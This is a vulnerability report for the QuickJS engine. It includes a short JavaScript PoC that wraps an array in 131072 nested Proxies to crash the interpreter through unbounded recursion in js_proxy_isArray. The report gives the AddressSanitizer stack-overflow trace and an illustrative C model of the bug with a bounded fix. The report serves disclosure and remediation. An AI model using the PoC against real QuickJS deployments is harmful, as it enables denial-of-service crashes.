Version : 2788d71
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
testcase:

```js
Array.isArray([]);
Array.isArray({}), Array.isArray(null), Array.isArray(0), Array.isArray(0.1),
Array.isArray(" "), Array.isArray(void 0),
Array.isArray(new Proxy([], {})), Array.isArray(new Proxy({}, {})),
Array.isArray(new Proxy(new Proxy([], {}), {})),
Array.isArray(new Proxy(new Proxy({}, {}), {}));
for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {});
Array.isArray(r), RangeError;
```
PoC:

```js
// poc.js
for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {});
Array.isArray(r);
```
The js_proxy_isArray() function and the JS_IsArray() function call each other recursively, one level per Proxy layer, so a sufficiently deep chain of Proxies never returns before the native stack is exhausted: the recursion is unbounded and ends in the stack overflow reported by AddressSanitizer.
Execution steps & Output:

```
$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING
```
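The following is an added example, not code from QuickJS or from the reporters. It is a small self-contained C model of the pattern the report describes (two routines that call each other once per Proxy layer, with no bound) placed next to a bounded variant that unwraps the Proxy chain in a loop and reports an error past a fixed depth instead of exhausting the native stack. The `Value` type, `MAX_PROXY_DEPTH`, and all function names are assumptions made for this example; QuickJS's real types and its fix are not reproduced here.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model for this example (not QuickJS's own types): a value is a
 * plain array, a plain object, or a Proxy wrapping another value. */
typedef enum { V_ARRAY, V_OBJECT, V_PROXY } ValueKind;

typedef struct Value {
    ValueKind kind;
    struct Value *target;   /* set only when kind == V_PROXY */
} Value;

/* Tri-state result, as an IsArray-style engine routine needs:
 * 1 = is an array, 0 = is not, -1 = error to be thrown to script. */
enum { IS_ARRAY_FALSE = 0, IS_ARRAY_TRUE = 1, IS_ARRAY_ERROR = -1 };

/* --- Pattern from the report: mutual recursion, one level per Proxy ------ */
static int proxy_is_array_unbounded(const Value *v);

static int is_array_unbounded(const Value *v)
{
    switch (v->kind) {
    case V_ARRAY: return IS_ARRAY_TRUE;
    case V_PROXY: return proxy_is_array_unbounded(v);   /* recurses */
    default:      return IS_ARRAY_FALSE;
    }
}

static int proxy_is_array_unbounded(const Value *v)
{
    /* No depth check: stack use grows with the length of the Proxy chain. */
    return is_array_unbounded(v->target);
}

/* --- Bounded variant: same answer, constant stack, explicit limit -------- */
#define MAX_PROXY_DEPTH 10000   /* assumed limit, chosen for the example */

static int is_array_bounded(const Value *v)
{
    size_t depth = 0;
    while (v->kind == V_PROXY) {
        if (++depth > MAX_PROXY_DEPTH)
            return IS_ARRAY_ERROR;   /* the engine would throw a RangeError */
        v = v->target;
    }
    return v->kind == V_ARRAY ? IS_ARRAY_TRUE : IS_ARRAY_FALSE;
}

/* --- Helpers: build and free a chain of n Proxies around a base value ---- */
static void free_chain(Value *v, const Value *base)
{
    while (v && v != base) {
        Value *next = v->target;
        free(v);
        v = next;
    }
}

static Value *wrap_in_proxies(Value *base, size_t n)
{
    Value *cur = base;
    for (size_t i = 0; i < n; i++) {
        Value *p = malloc(sizeof *p);
        if (!p) { free_chain(cur, base); return NULL; }
        p->kind = V_PROXY;
        p->target = cur;
        cur = p;
    }
    return cur;
}

/* Wrap an array (or plain object) in n Proxies, classify it with the bounded
 * routine, free the chain and return the result code. */
static int classify_chain_bounded(int base_is_array, size_t n)
{
    Value base = { base_is_array ? V_ARRAY : V_OBJECT, NULL };
    Value *top = wrap_in_proxies(&base, n);
    if (!top) return IS_ARRAY_ERROR;
    int r = is_array_bounded(top);
    free_chain(top, &base);
    return r;
}

/* Same with the recursive routine; only safe for short chains. */
static int classify_chain_unbounded(int base_is_array, size_t n)
{
    Value base = { base_is_array ? V_ARRAY : V_OBJECT, NULL };
    Value *top = wrap_in_proxies(&base, n);
    if (!top) return IS_ARRAY_ERROR;
    int r = is_array_unbounded(top);
    free_chain(top, &base);
    return r;
}

int main(void)
{
    printf("bounded,   3 proxies around []: %d\n", classify_chain_bounded(1, 3));
    printf("bounded,   3 proxies around {}: %d\n", classify_chain_bounded(0, 3));
    printf("unbounded, 3 proxies around []: %d\n", classify_chain_unbounded(1, 3));
    printf("bounded, %d proxies around []: %d (error -> RangeError)\n",
           MAX_PROXY_DEPTH + 1, classify_chain_bounded(1, MAX_PROXY_DEPTH + 1));
    return 0;
}
```

The unbounded variant is only exercised on short chains here; fed a chain as long as the PoC's (131072 layers) it reproduces the report's failure mode, a native stack overflow. Unwrapping in a loop is one way to bound the work; the other common engine approach keeps the recursion but checks the remaining stack space at the entry of the recursive routine and throws once it runs low. Either way the script-visible outcome becomes a catchable RangeError, which is the behaviour the testcase's trailing `RangeError` marker expects, rather than a process crash.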
Credits: @Ye0nny, @EJueon of the seclab-yonsei.